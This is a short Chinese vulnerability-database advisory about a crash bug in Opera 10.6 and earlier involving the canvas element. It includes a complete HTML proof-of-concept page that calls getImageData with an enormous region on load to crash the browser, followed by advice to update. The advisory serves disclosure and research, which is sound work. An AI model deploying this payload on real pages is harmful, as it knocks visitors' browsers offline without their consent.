Opera Crash by canvas Element

  • 发表于
  • Vulndb

影响版本:

Opera 10.6 and lower

漏洞描述:

Opera 是独一无二的网络浏览器, 功能强大,使您上网更高效、更安全、更极速

Opera浏览器 <canvas> Element存在安全问题。

<*参考

http://pouya.info/blog/userfiles/vul/OperaCC.pdf

*>

测试方法:
本站提 供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

<html>
<body onload="Opera()">
<script language=JavaScript>
function Opera() {
canvas = document.getElementById("canvas");
ctx = canvas.getContext("2d");
ctx.getImageData(0,0,0x20000,0x20000);
}
</script>
<canvas id=canvas width=10 height=10></canvas>
</body>
</html>

安全建议:

update software